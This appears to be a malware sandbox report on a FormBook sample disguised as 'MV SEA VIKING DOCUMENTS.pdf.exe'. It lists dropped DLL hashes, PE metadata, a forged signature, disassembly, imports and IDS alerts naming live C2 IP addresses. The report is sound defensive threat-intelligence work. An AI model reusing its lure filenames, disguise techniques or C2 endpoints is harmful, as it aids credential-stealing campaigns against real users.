                                                                                                                                                                                                                              SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                                                                                                                                                              MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                                                                                                                                                              SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                                                                                                                                                                              SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                                                                                                                                                                              SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                              • Filename: MV SEA VIKING DOCUMENTS.pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: IMG140202214020221402022.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: Liquidacin por Factorizacin de Crditos.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: Liquidacin por Factorizacin de Crditos.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: 36PzmSKXoT.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: 36PzmSKXoT.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: TNT Invoice 21-02-2022#U00b7pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: TNT Invoice 21-02-2022#U00b7pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: Order (965155).exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: Order (965155).exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: b4#Uc6a9.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: CDH_0302 pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: CDH_0302 pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: OFERTA ALSSET.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: OFERTA ALSSET.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: OFERTA ALSSET.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: Invitation To Quote 17-02-2022#U00b7pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: Invitation to Quote 17-02-2022#U00b7pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: Invitation To Quote 17-02-2022#U00b7pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: Invitation to Quote 17-02-2022#U00b7pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                                              Entropy (8bit):5.814115788739565
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                                                                                                                                                              MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                                                                                                                                                              SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                                                                                                                                                                              SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                                                                                                                                                                              SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\provmigrate.dll

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):77824
                                                                                                                                                                                                                              Entropy (8bit):6.364683853724386
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:7U1N+pZS+NBd67ZRLrrqJpjunm/8KOjNPZJ9VQ8Q:7s+pZSsBd6PnWr6m/8djNPH9VQ8
                                                                                                                                                                                                                              MD5:F5AA22E7A259F9A7BCA1A12A9AE9B9B3
                                                                                                                                                                                                                              SHA1:AE369814DEDF19BA0E362C1885105B84A7F0CB1E
                                                                                                                                                                                                                              SHA-256:2279DCBFA306679DFC5E47F9E173ABA222E01097E1D8D8FDDB8740595ABFAE0E
                                                                                                                                                                                                                              SHA-512:CC50D6447FE3056435A8E291D7ABA7B57B9E1C21A200371170CB7BC81048F29AE4B73E57F0926011FA95B1E51872A3E981A1AB43B4301EBAAE6BBD3DCB52BA4A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Ba)...G[..G[..G[.x.[B.G[.kCZ..G[.kDZ..G[..F[..G[.kFZ..G[.kBZ..G[.kGZ..G[.kNZ..G[.k.[..G[.kEZ..G[Rich..G[........PE..L......c...........!.........<...............................................p.......B....@A.................................#.......P..8....................`..P....&..T............................................ ..........`....................text...D........................... ..`.data...............................@....idata....... ......................@..@.didat.......@......................@....rsrc...8....P......................@..@.reloc..P....`......."..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\raschapext.dll

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):77824
                                                                                                                                                                                                                              Entropy (8bit):6.315462687965154
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:O/ZLBKJn6SdpC5fmd/cdCN92bmFHfA96O8P8P5QF7NkQyUpyN9E233ITQB0o9:No5fmt72bmFHfUZ8PkP9E234kB0
                                                                                                                                                                                                                              MD5:5A7F3388AB710A50648B5E2F1F651EF5
                                                                                                                                                                                                                              SHA1:5DE0CC2FC29E1EAFD0490E9FDB4D78298268B134
                                                                                                                                                                                                                              SHA-256:04975AECF94039D1CD1C207EBDCE948D6D2C9323CAEF02F6D4568D7CAD8427CD
                                                                                                                                                                                                                              SHA-512:EABCC39F395B6EAC02FCDC4264F91E77DC755E95DC0F2B0C190527F2266AFE722C5DE5D745748B55CBA5278B5F1FF776D2BF3A66C273578B361E9E509C8D5A5E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}k.9...9...9...0r..{...-a..;...-a..*...9......-a..>...-a..1...-a..8...-a..)...-a{.8...-a..8...Rich9...........PE..L.....G...........!.........H......P.....................................................@A................................`".......P..h....................`.......7..T............................................ ..\............................text............................... ..`.data...............................@....idata....... ......................@..@.didat.......@......................@....rsrc...h....P......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\usp10.dll

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):77824
                                                                                                                                                                                                                              Entropy (8bit):6.564995553201286
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:RE1p5jTZWpwLrCziIK8+wv/O50y5FE2bdEGcToZAD56k8:RE1pPL2zHoytG5dHJZE5d8
                                                                                                                                                                                                                              MD5:A7209ABD666D34E18CD5FC85D2435A03
                                                                                                                                                                                                                              SHA1:69A007F51EA2827E507FA3867B1B637E0A450EC2
                                                                                                                                                                                                                              SHA-256:B11EDB8F9B5D238DFBBAE316D0DA72E1006B6B24DD57C8B879428F5ADACFA0DF
                                                                                                                                                                                                                              SHA-512:1E508E928EFFE382D0667F71994C74610E0B2E24248E9AD84736942E8851E272FC62EE6F13C4E4B090B1A2BCC6F1487B667594488F47502DE2327D19F0497F32
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}n..9.w.9.w.9.w.-ds.:.w.-dw.8.w.-d..8.w.-du.8.w.Rich9.w.........................PE..L..................!......... ............... .....e.........................p.......Y....@E........................ ................@.......................`..........T............................................................................text............................... ..`.data........ ......................@....00cfg.......0......................@..@.rsrc........@......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                              Entropy (8bit):7.669364566747911
                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                              File name:MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                                                              File size:628784
                                                                                                                                                                                                                              MD5:319860d181378bf868e4deedcf5fbfb6
                                                                                                                                                                                                                              SHA1:cf91efda8bdba4674cb72d33ce391241ec4b9678
                                                                                                                                                                                                                              SHA256:58f1715336d2b7478c4539589dfc2065b3201df5505756474e00636b432cb378
                                                                                                                                                                                                                              SHA512:f27d1c40321d87043bdfc5fb8a6b8b049d2c0cb15ad32cf9518e45875c1da225d25de19bb9d58588ec47bbac900342ed8c5a732c9131ea558a6ae6682cb783e7
                                                                                                                                                                                                                              SSDEEP:12288:9b6UG1NAN8Axjam22QMPnJjUisvEe/8dUMq2PZgue0yzgX3GXUe:9bm1YfV2vhvEeUdUgPZgpgXWXR
                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                              Icon Hash:4406dccce4eadc0c

                                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Entrypoint:0x40352d
                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                                                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                                                              Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                              File Version Major:4
                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                              Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6

                                                                                                                                                                                                                              Authenticode Signature

                                                                                                                                                                                                                              Signature Valid:false
                                                                                                                                                                                                                              Signature Issuer:E=UNDIATONICALLY@Anecdotic.pat, CN=Mdereferaternes, OU=Vllingerne, O=Universitetsboghandelens, L=HAEMOGREGARINA, S=Shadiness5, C=CX
                                                                                                                                                                                                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                                                              Error Number:-2146762487
                                                                                                                                                                                                                              Not Before, Not After
                                                                                                                                                                                                                              • 21/02/2022 10:00:32 21/02/2023 10:00:32
                                                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                                                              • E=UNDIATONICALLY@Anecdotic.pat, CN=Mdereferaternes, OU=Vllingerne, O=Universitetsboghandelens, L=HAEMOGREGARINA, S=Shadiness5, C=CX
                                                                                                                                                                                                                              Version:3
                                                                                                                                                                                                                              Thumbprint MD5:8BD2727F75CC84089DBA0C5875EE94DD
                                                                                                                                                                                                                              Thumbprint SHA-1:D30CE59FEAFC15F2FEA4F790EDF6A6E3F6879931
                                                                                                                                                                                                                              Thumbprint SHA-256:BFEC36B4E3B583BB9CA109C55DF9C9273FD158EDA306D770C86B805274D8542A
                                                                                                                                                                                                                              Serial:00

                                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                                                              sub esp, 000003F4h
                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                              push 00000020h
                                                                                                                                                                                                                              pop edi
                                                                                                                                                                                                                              xor ebx, ebx
                                                                                                                                                                                                                              push 00008001h
                                                                                                                                                                                                                              mov dword ptr [ebp-14h], ebx
                                                                                                                                                                                                                              mov dword ptr [ebp-04h], 0040A2E0h
                                                                                                                                                                                                                              mov dword ptr [ebp-10h], ebx
                                                                                                                                                                                                                              call dword ptr [004080CCh]
                                                                                                                                                                                                                              mov esi, dword ptr [004080D0h]
                                                                                                                                                                                                                              lea eax, dword ptr [ebp-00000140h]
                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                              mov dword ptr [ebp-0000012Ch], ebx
                                                                                                                                                                                                                              mov dword ptr [ebp-2Ch], ebx
                                                                                                                                                                                                                              mov dword ptr [ebp-28h], ebx
                                                                                                                                                                                                                              mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                                                                                                                                                              call esi
                                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                                              jne 00007FB40883FCBAh
                                                                                                                                                                                                                              lea eax, dword ptr [ebp-00000140h]
                                                                                                                                                                                                                              mov dword ptr [ebp-00000140h], 00000114h
                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                              call esi
                                                                                                                                                                                                                              mov ax, word ptr [ebp-0000012Ch]
                                                                                                                                                                                                                              mov ecx, dword ptr [ebp-00000112h]
                                                                                                                                                                                                                              sub ax, 00000053h
                                                                                                                                                                                                                              add ecx, FFFFFFD0h
                                                                                                                                                                                                                              neg ax
                                                                                                                                                                                                                              sbb eax, eax
                                                                                                                                                                                                                              mov byte ptr [ebp-26h], 00000004h
                                                                                                                                                                                                                              not eax
                                                                                                                                                                                                                              and eax, ecx
                                                                                                                                                                                                                              mov word ptr [ebp-2Ch], ax
                                                                                                                                                                                                                              cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                                                                                                                                                              jnc 00007FB40883FC8Ah
                                                                                                                                                                                                                              and word ptr [ebp-00000132h], 0000h
                                                                                                                                                                                                                              mov eax, dword ptr [ebp-00000134h]
                                                                                                                                                                                                                              movzx ecx, byte ptr [ebp-00000138h]
                                                                                                                                                                                                                              mov dword ptr [00434FB8h], eax
                                                                                                                                                                                                                              xor eax, eax
                                                                                                                                                                                                                              mov ah, byte ptr [ebp-0000013Ch]
                                                                                                                                                                                                                              movzx eax, ax
                                                                                                                                                                                                                              or eax, ecx
                                                                                                                                                                                                                              xor ecx, ecx
                                                                                                                                                                                                                              mov ch, byte ptr [ebp-2Ch]
                                                                                                                                                                                                                              movzx ecx, cx
                                                                                                                                                                                                                              shl eax, 10h
                                                                                                                                                                                                                              or eax, ecx

                                                                                                                                                                                                                              Rich Headers

                                                                                                                                                                                                                              Programming Language:
                                                                                                                                                                                                                              • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x4d0000x5ade0.rsrc
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x982c00x1570.rsrc
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                              Sections

                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                              .text0x10000x68970x6a00False0.666126179245data6.45839821493IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              .rdata0x80000x14a60x1600False0.439275568182data5.02410928126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              .data0xa0000x2b0180x600False0.521484375data4.15458210409IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              .ndata0x360000x170000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              .rsrc0x4d0000x5ade00x5ae00False0.845198052785data7.43894434396IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                              Resources

                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                                              RT_ICON0x4d2980x35e24PNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                                                                                                                                                              RT_ICON0x830c00x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                                                                                                                                                              RT_ICON0x938e80xf928PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                                                                                                                                                              RT_ICON0xa32100x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295EnglishUnited States
                                                                                                                                                                                                                              RT_DIALOG0xa74380x100dataEnglishUnited States
                                                                                                                                                                                                                              RT_DIALOG0xa75380x11cdataEnglishUnited States
                                                                                                                                                                                                                              RT_DIALOG0xa76580xc4dataEnglishUnited States
                                                                                                                                                                                                                              RT_DIALOG0xa77200x60dataEnglishUnited States
                                                                                                                                                                                                                              RT_GROUP_ICON0xa77800x3edataEnglishUnited States
                                                                                                                                                                                                                              RT_VERSION0xa77c00x2e0dataEnglishUnited States
                                                                                                                                                                                                                              RT_MANIFEST0xa7aa00x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                                                                                                                              Imports

                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                              ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                                                                                                                                                              SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                                                                                                                                                              ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                                                                                                                                                              COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                                                                                                                                                              USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                                                                                                                                                              GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                                                                                                                                                              KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                                                                                                                                                                                              Version Infos

                                                                                                                                                                                                                              DescriptionData
                                                                                                                                                                                                                              LegalCopyrightCopyright (C) 2016-2022 - All Rights Reserved
                                                                                                                                                                                                                              FileVersion2.2.0.0
                                                                                                                                                                                                                              CompanyNameGiantDock
                                                                                                                                                                                                                              LegalTrademarksCopyright (C) 2016-2022 - All Rights Reserved
                                                                                                                                                                                                                              CommentsGiantDock
                                                                                                                                                                                                                              ProductNameGiantDock
                                                                                                                                                                                                                              FileDescriptionGiantDock
                                                                                                                                                                                                                              Translation0x0409 0x04b0

                                                                                                                                                                                                                              Possible Origin

                                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                              EnglishUnited States

                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                              Snort IDS Alerts

                                                                                                                                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                              02/21/22-16:51:29.980031TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977980192.168.11.2079.110.48.188
                                                                                                                                                                                                                              02/21/22-16:51:29.980031TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977980192.168.11.2079.110.48.188
                                                                                                                                                                                                                              02/21/22-16:51:29.980031TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977980192.168.11.2079.110.48.188
                                                                                                                                                                                                                              02/21/22-16:51:51.574671TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978580192.168.11.2054.154.44.39
                                                                                                                                                                                                                              02/21/22-16:51:51.574671TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978580192.168.11.2054.154.44.39
                                                                                                                                                                                                                              02/21/22-16:51:51.574671TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978580192.168.11.2054.154.44.39
                                                                                                                                                                                                                              02/21/22-16:52:22.997085TCP1201ATTACK-RESPONSES 403 Forbidden804979034.102.136.180192.168.11.20
                                                                                                                                                                                                                              02/21/22-16:52:28.620803TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              02/21/22-16:52:28.620803TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              02/21/22-16:52:28.620803TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              02/21/22-16:52:34.286970TCP1201ATTACK-RESPONSES 403 Forbidden804979234.102.136.180192.168.11.20
                                                                                                                                                                                                                              02/21/22-16:53:14.197622TCP1201ATTACK-RESPONSES 403 Forbidden804979634.102.136.180192.168.11.20
                                                                                                                                                                                                                              02/21/22-16:53:24.591715TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979880192.168.11.20162.0.209.21
                                                                                                                                                                                                                              02/21/22-16:53:24.591715TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979880192.168.11.20162.0.209.21
                                                                                                                                                                                                                              02/21/22-16:53:24.591715TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979880192.168.11.20162.0.209.21
                                                                                                                                                                                                                              02/21/22-16:53:30.061606TCP1201ATTACK-RESPONSES 403 Forbidden804979934.102.136.180192.168.11.20
                                                                                                                                                                                                                              02/21/22-16:53:35.418969TCP2031453ET TROJAN FormBook CnC Checkin (GET)4980080192.168.11.2066.29.154.157
                                                                                                                                                                                                                              02/21/22-16:53:35.418969TCP2031449ET TROJAN FormBook CnC Checkin (GET)4980080192.168.11.2066.29.154.157
                                                                                                                                                                                                                              02/21/22-16:53:35.418969TCP2031412ET TROJAN FormBook CnC Checkin (GET)4980080192.168.11.2066.29.154.157
                                                                                                                                                                                                                              02/21/22-16:54:00.734732ICMP402ICMP Destination Unreachable Port Unreachable192.168.11.201.1.1.1
